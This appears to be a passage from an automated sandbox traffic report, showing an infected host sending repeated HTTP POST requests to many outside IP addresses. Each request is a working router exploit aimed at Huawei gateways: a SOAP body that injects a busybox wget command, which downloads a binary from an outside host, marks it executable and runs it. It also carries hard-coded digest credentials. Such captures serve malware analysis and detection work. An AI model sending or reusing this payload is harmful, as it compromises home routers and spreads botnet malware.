                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          132192.168.2.2359814157.147.158.7337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.130666018 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          133192.168.2.2339258193.191.250.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.130708933 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          134192.168.2.2342510157.126.47.4037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.130740881 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          135192.168.2.2340402107.151.34.16737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.131627083 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          136192.168.2.234203063.43.76.5137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.131632090 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          137192.168.2.2346140157.67.62.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.131642103 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          138192.168.2.235450641.126.6.13537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.131669998 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          139192.168.2.2334766197.191.211.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.131675005 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          140192.168.2.2359122197.232.114.14837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.131675959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          141192.168.2.233411247.29.97.6937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.131725073 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
